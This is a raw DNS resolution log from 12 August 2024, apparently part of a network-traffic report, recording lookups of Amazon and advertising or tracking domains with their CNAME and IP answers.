                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.950026989 CEST1.1.1.1192.168.2.40x5276No error (0)completion.amazon.co.uk3.253.177.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.954509020 CEST1.1.1.1192.168.2.40x9529No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.956012964 CEST1.1.1.1192.168.2.40x20adNo error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.956012964 CEST1.1.1.1192.168.2.40x20adNo error (0)aax-eu-retail-direct.amazon-adsystem.com52.95.119.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:50.885166883 CEST1.1.1.1192.168.2.40x28d3No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:50.885694981 CEST1.1.1.1192.168.2.40x72f6No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:50.885694981 CEST1.1.1.1192.168.2.40x72f6No error (0)aax-eu-retail-direct.amazon-adsystem.com52.95.119.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:52.936956882 CEST1.1.1.1192.168.2.40x6594No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:52.938239098 CEST1.1.1.1192.168.2.40x135No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:52.938239098 CEST1.1.1.1192.168.2.40x135No error (0)unagi-eu.amazon.com52.95.121.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:54.764978886 CEST1.1.1.1192.168.2.40x819bNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:54.764978886 CEST1.1.1.1192.168.2.40x819bNo error (0)unagi-eu.amazon.com67.220.226.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:54.765675068 CEST1.1.1.1192.168.2.40x6b87No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:07.243458033 CEST1.1.1.1192.168.2.40x1b41No error (0)aax-eu.amazon-adsystem.com52.95.126.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.749552011 CEST1.1.1.1192.168.2.40x2269No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)match.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com52.49.51.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com52.49.88.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com54.77.93.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com54.154.214.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com52.30.124.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com52.31.201.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com34.249.40.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.751099110 CEST1.1.1.1192.168.2.40x83daNo error (0)euw-ice.360yield.com52.213.225.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.779028893 CEST1.1.1.1192.168.2.40x6840No error (0)match.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.779028893 CEST1.1.1.1192.168.2.40x6840No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.019084930 CEST1.1.1.1192.168.2.40x6b0aNo error (0)redirect.prod.experiment.routing.cloudfront.aws.a2z.comredirect.stripe1.prod.experiment.routing.cloudfront.aws.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.019084930 CEST1.1.1.1192.168.2.40x6b0aNo error (0)redirect.stripe1.prod.experiment.routing.cloudfront.aws.a2z.comedger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.019084930 CEST1.1.1.1192.168.2.40x6b0aNo error (0)edger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.com44.226.105.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.019084930 CEST1.1.1.1192.168.2.40x6b0aNo error (0)edger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.com44.231.43.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.019084930 CEST1.1.1.1192.168.2.40x6b0aNo error (0)edger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.com35.155.114.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.020401955 CEST1.1.1.1192.168.2.40xa388No error (0)redirect.prod.experiment.routing.cloudfront.aws.a2z.comredirect.stripe2.prod.experiment.routing.cloudfront.aws.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.020401955 CEST1.1.1.1192.168.2.40xa388No error (0)redirect.stripe2.prod.experiment.routing.cloudfront.aws.a2z.comedger-edger-4e3vcwvnek77-1367313377.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.758641005 CEST1.1.1.1192.168.2.40xa062No error (0)audex.userreport.comd2u28gf9o4d1cv.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759557962 CEST1.1.1.1192.168.2.40x465aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759592056 CEST1.1.1.1192.168.2.40x60eNo error (0)audex.userreport.comd2u28gf9o4d1cv.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759592056 CEST1.1.1.1192.168.2.40x60eNo error (0)d2u28gf9o4d1cv.cloudfront.net65.9.66.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759592056 CEST1.1.1.1192.168.2.40x60eNo error (0)d2u28gf9o4d1cv.cloudfront.net65.9.66.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759592056 CEST1.1.1.1192.168.2.40x60eNo error (0)d2u28gf9o4d1cv.cloudfront.net65.9.66.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759592056 CEST1.1.1.1192.168.2.40x60eNo error (0)d2u28gf9o4d1cv.cloudfront.net65.9.66.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.759639978 CEST1.1.1.1192.168.2.40xa558No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.760325909 CEST1.1.1.1192.168.2.40xb73aNo error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.761190891 CEST1.1.1.1192.168.2.40xaed0No error (0)rd.frontend.weborama.fr35.190.24.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.763534069 CEST1.1.1.1192.168.2.40x9cf9No error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.763534069 CEST1.1.1.1192.168.2.40x9cf9No error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.800889015 CEST1.1.1.1192.168.2.40x9ac9No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801245928 CEST1.1.1.1192.168.2.40xc1b7No error (0)pbs.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801245928 CEST1.1.1.1192.168.2.40xc1b7No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801245928 CEST1.1.1.1192.168.2.40xc1b7No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801567078 CEST1.1.1.1192.168.2.40x7c1bNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801839113 CEST1.1.1.1192.168.2.40xddbNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801920891 CEST1.1.1.1192.168.2.40x710Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.801970005 CEST1.1.1.1192.168.2.40xe36Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.802269936 CEST1.1.1.1192.168.2.40xc28eNo error (0)pbs.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.802385092 CEST1.1.1.1192.168.2.40x3709No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.815454960 CEST1.1.1.1192.168.2.40x3fafName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.823918104 CEST1.1.1.1192.168.2.40x8940No error (0)public-prod-dspcookiematching.dmxleo.com188.65.124.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.824263096 CEST1.1.1.1192.168.2.40xee4fNo error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.824553013 CEST1.1.1.1192.168.2.40x9b97No error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.126007080 CEST1.1.1.1192.168.2.40x1ffNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.126007080 CEST1.1.1.1192.168.2.40x1ffNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.126007080 CEST1.1.1.1192.168.2.40x1ffNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.126007080 CEST1.1.1.1192.168.2.40x1ffNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.709047079 CEST1.1.1.1192.168.2.40x8d46No error (0)sync.rfp.fout.jp35.186.196.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.813858986 CEST1.1.1.1192.168.2.40x53eName error (3)beacon.krxd.netnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.814006090 CEST1.1.1.1192.168.2.40x8828Name error (3)beacon.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.816307068 CEST1.1.1.1192.168.2.40x876eNo error (0)s.amazon-adsystem.com52.46.128.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.823851109 CEST1.1.1.1192.168.2.40x15ffName error (3)beacon.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.833720922 CEST1.1.1.1192.168.2.40x6d76No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.833889961 CEST1.1.1.1192.168.2.40xf8dbNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.833889961 CEST1.1.1.1192.168.2.40xf8dbNo error (0)user-data-eu.bidswitch.net35.214.149.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.865871906 CEST1.1.1.1192.168.2.40xa23bNo error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.865871906 CEST1.1.1.1192.168.2.40xa23bNo error (0)match-eu-central-1-ecs.sharethrough.com35.156.61.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.867575884 CEST1.1.1.1192.168.2.40xcd24No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.466717005 CEST1.1.1.1192.168.2.40x1eecNo error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.466778994 CEST1.1.1.1192.168.2.40xfd4No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com164.132.25.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com5.196.111.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com51.178.195.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com178.32.197.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com178.32.197.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com5.135.209.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com91.134.110.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com149.202.238.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com5.196.111.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com149.202.238.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com5.135.209.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com51.178.195.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com217.182.178.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com217.182.178.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com164.132.25.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642916918 CEST1.1.1.1192.168.2.40x633cNo error (0)rtb-csync-euw2.smartadserver.com91.134.110.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642939091 CEST1.1.1.1192.168.2.40x6f70No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.642954111 CEST1.1.1.1192.168.2.40x9e65No error (0)public-prod-dspcookiematching.dmxleo.com188.65.124.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.191.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.63.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.34.48.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.34.151.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.214.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.121.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.118.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.703425884 CEST1.1.1.1192.168.2.40xef0fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.33.107.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.705055952 CEST1.1.1.1192.168.2.40x87d4No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.705055952 CEST1.1.1.1192.168.2.40x87d4No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.705055952 CEST1.1.1.1192.168.2.40x87d4No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.847362041 CEST1.1.1.1192.168.2.40xd07eNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
